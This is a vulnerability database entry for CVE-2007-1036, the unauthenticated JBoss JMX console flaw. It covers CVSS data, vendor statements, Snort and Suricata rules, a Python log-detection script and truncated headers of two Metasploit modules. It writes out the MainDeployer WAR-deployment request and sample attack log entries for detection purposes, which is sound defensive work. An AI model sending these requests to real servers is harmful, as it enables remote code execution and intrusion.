CVE-2007-1036
Published 2007-02-21
Priority: P1 87 · high · 7.5 (CVSS 2.0) · AV:N/AC:L/Au:N/C:P/I:P/A:P
Flags: ITW (exploited in the wild) · EXPLOIT · VulnCheck KEV · Ransomware
EPSS: 81.83% (99.6th percentile)
The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass authentication and gain administrative access via direct requests.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | procurve_manager | — | — |
| hp | procurve_manager | — | — |
Detection & IOCs (extracted from sources)
- Command: `action=invokeOpByName&name=jboss.system:service=MainDeployer&methodName=deploy&argType=java.lang.String&arg0=<WAR_URL>`
- Other: `Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation`
- Snort: `alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/invoker/JMXInvokerServlet/"; nocase; reference:cve,2007-1036; reference:url,exploit-db.com/exploits/21080/; classtype:web-application-attack; sid:2015747; rev:4; metadata:created_at 2012_09_28, cve CVE_2007_1036, confidence Medium, signature_severity Major, updated_at 2020_04_22;)`
- Detect unauthenticated POST requests to /jmx-console/HtmlAdaptor with 'invokeOpByName' and 'MainDeployer' parameters, indicating WAR deployment via the JMX Console.
- Detect POST requests to /invoker/JMXInvokerServlet with Content-Type 'application/x-java-serialized-object'; this indicates JMXInvokerServlet abuse for unauthenticated WAR deployment.
- Monitor for HTTP requests to /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo, which attackers use for automated platform fingerprinting prior to exploitation.
- Alert on HTTP verbs other than GET or POST (e.g., HEAD) targeting /jmx-console/HtmlAdaptor, as the exploit supports non-standard verbs to bypass authentication filters (CVE-2010-0738 chaining).
- Check for JBoss version strings 'CVSTag=Branch_4_', 'SVNTag=JBoss_4_', or 'SVNTag=JBoss_5_' in HTTP responses to /invoker/JMXInvokerServlet; these indicate vulnerable JBoss 4.x/5.x targets.
- Note: the exploit only works if the target JBoss server can make outbound HTTP connections back to the attacker (for WAR retrieval via MainDeployer). Egress filtering blocks this attack vector.
- Note: the DeploymentFileRepository-based attack path (via JMXInvokerServlet) applies only to JBoss 4.x and 5.x.
- Note: the vulnerability stems from the default JBoss configuration leaving the console and web management interfaces unauthenticated; securing these interfaces per the JBoss Application Server Guide mitigates the risk.
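The detection items above describe request patterns in prose; the following is an added example (not code from the advisory, the rule sources, or any vendor) that applies those heuristics to web-server log entries. It assumes a proxy or WAF log that records the request method, target, Content-Type and, for form posts, the body (a stock combined-format access log does not carry POST bodies); the log entries and the WAR URL in them are constructed for illustration.

```python
"""Detection heuristics for exposed JBoss management interfaces (CVE-2007-1036),
applied to constructed proxy/WAF log entries. Added example; not the advisory's
or any vendor's own code."""
from dataclasses import dataclass
from urllib.parse import urlsplit, parse_qs


@dataclass
class Request:
    method: str
    path: str
    query: str
    content_type: str = ""
    body: str = ""


@dataclass
class Finding:
    rule: str
    detail: str


# Constructed sample entries: (method, target, Content-Type, body). The body
# field is an assumption about the log source; the WAR URL is a placeholder.
SAMPLE_LOG = [
    ("GET", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo", "", ""),
    ("POST", "/jmx-console/HtmlAdaptor", "application/x-www-form-urlencoded",
     "action=invokeOpByName&name=jboss.system:service=MainDeployer&methodName=deploy"
     "&argType=java.lang.String&arg0=http://203.0.113.5/example.war"),
    ("HEAD", "/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.system:service=MainDeployer", "", ""),
    ("POST", "/invoker/JMXInvokerServlet/",
     "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation", ""),
    ("GET", "/index.html", "", ""),
]

JMX_CONSOLE = "/jmx-console/htmladaptor"
INVOKER = "/invoker/jmxinvokerservlet"


def parse(entry):
    method, target, ctype, body = entry
    parts = urlsplit(target)
    return Request(method.upper(), parts.path, parts.query, ctype, body)


def params(req):
    """Merge query-string and form-body parameters; HtmlAdaptor accepts both."""
    merged = parse_qs(req.query, keep_blank_values=True)
    if "x-www-form-urlencoded" in req.content_type.lower():
        for k, v in parse_qs(req.body, keep_blank_values=True).items():
            merged.setdefault(k, []).extend(v)
    return {k: v[0] for k, v in merged.items()}


def inspect(req):
    """Return the detection findings for one request (empty list if benign)."""
    findings = []
    path = req.path.lower()
    p = params(req)
    if path == JMX_CONSOLE:
        # Non-standard verbs against HtmlAdaptor (the CVE-2010-0738 filter bypass).
        if req.method not in ("GET", "POST"):
            findings.append(Finding("jmx-console-verb-bypass",
                                    f"{req.method} request to HtmlAdaptor"))
        # Deployment through the MainDeployer MBean.
        if p.get("action") == "invokeOpByName" and "MainDeployer" in p.get("name", ""):
            findings.append(Finding("jmx-console-maindeployer-deploy",
                                    f"deploy via MainDeployer, arg0={p.get('arg0', '?')}"))
        # ServerInfo inspection used for fingerprinting before exploitation.
        if p.get("action") == "inspectMBean" and "ServerInfo" in p.get("name", ""):
            findings.append(Finding("jmx-console-fingerprint", "ServerInfo MBean inspected"))
    elif path.rstrip("/") == INVOKER:
        # Serialized MarshalledInvocation objects sent to the invoker servlet.
        if "application/x-java-serialized-object" in req.content_type.lower():
            findings.append(Finding("jmxinvokerservlet-serialized-post",
                                    f"{req.method} with Content-Type {req.content_type}"))
        elif req.method == "POST":
            findings.append(Finding("jmxinvokerservlet-post",
                                    "POST to invoker without serialized content type"))
    return findings


def scan(entries):
    """Run inspect() over every log entry; returns (entry index, Finding) pairs."""
    return [(i, f) for i, e in enumerate(entries) for f in inspect(parse(e))]


if __name__ == "__main__":
    for idx, f in scan(SAMPLE_LOG):
        print(f"entry {idx}: {f.rule}: {f.detail}")
```

The entry using HEAD trips two rules at once (verb bypass and MainDeployer deploy), which is the combination worth alerting on with high confidence; the version-string check on responses from the list above needs response bodies and is not modelled here.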
CVSS provenance
- NVD (v2.0): 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
- VulnCheck: 7.5 HIGH
- Red Hat (vendor): 7.5 HIGH
GHSA
GHSA-mm58-72w4-25hp: HP ProCurve Manager (PCM) 3 (ghsa_unreviewed · 2022-05-17 · CVSS 7.5)
CVE-2013-4810 [HIGH] CWE-94
HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, Identity Driven Manager (IDM) 4.0, and Application Lifecycle Management allow remote attackers to execute arbitrary code via a marshalled object to (1) EJBInvokerServlet or (2) JMXInvokerServlet, aka ZDI-CAN-1760. NOTE: this is probably a duplicate of CVE-2007-1036, CVE-2010-0738, and/or CVE-2012-0874.
GHSA
GHSA-jchw-rw3j-3rjm (ghsa_unreviewed · 2022-05-01)
CVE-2007-1036 [HIGH]
The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass authentication and gain administrative access via direct requests.
VulnCheck
JBoss Direct Request Security Bypass (vulncheck · 2007 · CVSS 7.5)
CVE-2007-1036 [HIGH]
The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass authentication and gain administrative access via direct requests.
Affected: jboss JBoss
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://web.archive.org/web/20220227045141/https://risksense.com/wp-content/uploads/2019/09/RiskSense-Spotlight-Report-Ransomware.pdf; https://know.netenrich.com/blog/muhstik-do-you-know-this-botnet/; https://cybersecurityworks.com/pdf/ransomware/Spotlight_Ransomware2021.pdf; https://cybersecurit
Red Hat
CVE-2007-1036 [HIGH] (vendor_redhat · CVSS 7.5)
The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass authentication and gain administrative access via direct requests.
Statement: The JBoss AS console manager should always be secured prior to deployment, as directed in the JBoss Application Server Guide and release notes. By default, the JBoss AS installer gives users the ability to password protect the console manager. If the user did not use the installer, the raw JBoss services will be in a completely unconfigured state and these steps should be performed manually:
http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss
Red Hat
CVE-2007-2452 [HIGH] (vendor_redhat · CVSS 7.2)
Heap-based buffer overflow in the visit_old_format function in locate/locate.c in locate in GNU findutils before 4.2.31 might allow context-dependent attackers to execute arbitrary code via a long pathname in a locate database that has the old format, a different vulnerability than CVE-2001-1036.
Statement: Not vulnerable. Red Hat did not ship GNU locate in Red Hat Enterprise Linux 2.1, 3, 4, or 5. This issue does not affect the mlocate or slocate packages that are supplied with Red Hat Enterprise Linux.
Suricata
ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt (suricata · 2012-09-28 · CVE-2007-1036)
Rule: `alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/invoker/JMXInvokerServlet/"; nocase; reference:cve,2007-1036; reference:url,exploit-db.com/exploits/21080/; classtype:web-application-attack; sid:2015747; rev:4; metadata:created_at 2012_09_28, cve CVE_2007_1036, confidence Medium, signature_severity Major, updated_at 2020_04_22;)`
Exploit-DB
JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) (Metasploit) (exploitdb · 2012-09-05 · CVE-2007-1036)
---
Module source as captured (truncated in the source):
```ruby
require 'msf/core'
class Metasploit4 [ /JBoss/ ] }
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)',
      'Description' => %q{
        This module can be used to execute a payload on JBoss servers that have an
        exposed HTTPAdaptor's JMX Invoker exposed on the "JMXInvokerServlet". By invoking
        the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed
        to finally upload the selected payload to the target. The DeploymentFileRepository
        methods are only available on Jboss 4.x and 5.x.
      },
      'Author'      => [
        'Patrick Hof', # Vulnerability discovery, ana
```
Exploit-DB
JBoss JMX - Console Deployer Upload and Execute (Metasploit) (exploitdb · 2010-10-19 · CVE-2007-1036)
---
Module source as captured (truncated in the source):
```ruby
##
# $Id: jboss_maindeployer.rb 10754 2010-10-19 22:24:33Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 [ /(Jetty|JBoss)/ ] }
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'JBoss JMX Console Deployer Upload and Execute',
      'Description' => %q{
        This module can be used to execute a payload on JBoss servers that have
        an exposed "jmx-console" applicat
```
Metasploit
JBoss JMX Console Deployer Upload and Execute (metasploit)
This module can be used to execute a payload on JBoss servers that have an exposed "jmx-console" application. The payload is put on the server by using the jboss.system:MainDeployer functionality. To accomplish this, a temporary HTTP server is created to serve a WAR archive containing our payload. This method will only work if the target server allows outbound connections to us.
Metasploit
JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) (metasploit)
This module can be used to execute a payload on JBoss servers that have an exposed HTTPAdaptor's JMX Invoker exposed on the "JMXInvokerServlet". By invoking the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed to finally upload the selected payload to the target. The DeploymentFileRepository methods are only available on Jboss 4.x and 5.x.
References
- http://osvdb.org/33744
- http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss
- http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxConsole
- http://www.kb.cert.org/vuls/id/632656
- http://www.securityfocus.com/archive/1/460597/100/0/threaded
- http://www.securityfocus.com/archive/1/460605/100/0/threaded
- http://www.securityfocus.com/archive/1/460695/100/0/threaded
- http://www.securitytracker.com/id?1017677
- https://exchange.xforce.ibmcloud.com/vulnerabilities/32596